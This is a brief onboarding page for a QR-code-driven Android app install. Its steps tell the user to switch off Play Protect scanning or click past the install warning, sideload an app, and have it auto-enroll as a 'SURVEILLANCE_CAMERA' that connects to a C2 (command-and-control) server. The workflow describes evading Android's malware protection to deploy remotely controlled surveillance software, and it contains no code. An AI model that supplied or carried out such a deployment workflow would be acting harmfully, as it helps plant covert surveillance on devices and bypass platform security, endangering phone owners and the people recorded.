Universal Onboarding Workflow

How this single QR code handles Play Protect, installation, and configuration

  1. 1. Scan QR Code with Phone Camera:

    Point your Samsung / Android phone's regular camera at the QR code on the left. Tap the popup link to open the 1-Click Setup Wizard.

  2. 2. 1-Tap Play Protect Bypass:

    On the setup wizard, tap the "1-Tap: Open Play Protect Settings" button to toggle off Play Protect scanning (or simply tap "More details" ➔ "Install anyway" when the Android install prompt appears).

  3. 3. Install & Auto-Configure:

    Tap "Download & Install App". Once installed, tap "Launch App & Auto-Configure" (or open the app) — it will automatically enroll with role SURVEILLANCE_CAMERA and connect to your C2 server!

Re-Scanning inside App (Optional):

If the app is already installed, scanning this same QR code using the in-app scanner also instantly updates the role configuration and reconnects.
